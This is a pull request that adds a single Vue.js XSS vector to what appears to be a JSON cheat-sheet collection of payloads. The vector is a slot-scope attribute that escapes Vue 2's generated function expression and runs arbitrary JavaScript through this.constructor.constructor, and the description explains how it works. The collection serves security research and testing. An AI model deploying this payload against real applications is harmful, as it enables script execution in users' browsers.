### PR TITLE
Add slot-scope gadget

### DIFF
--- a/json/vuejs.json
+++ b/json/vuejs.json
@@ -823,6 +823,20 @@
     {
         "authors": [
             {
+                "name": "Davit Karapetyan",
+                "company": "Independent consultant",
+                "twitterUrl": "https:\/\/twitter.com\/davwwwx"
+            }
+        ],
+        "vector": "<p slot-scope=\"){}}])+this.constructor.constructor('alert(1)')()})};\/\/\">",
+        "hash": "",
+        "type": "reflected",
+        "csp": false,
+        "version" : 2
+    },
+    {
+        "authors": [
+            {
                 "name": "Gareth Heyes",
                 "company": "PortSwigger",
                 "twitterUrl": "https:\/\/twitter.com\/garethheyes"


### PR DESCRIPTION
As per documentation - [https://vuejs.org/v2/api/#slot-scope-deprecated](https://vuejs.org/v2/api/#slot-scope-deprecated), `slot-scope` expects function argument expression so it can be used to execute arbitrary javascript closing vuejs generated function expression.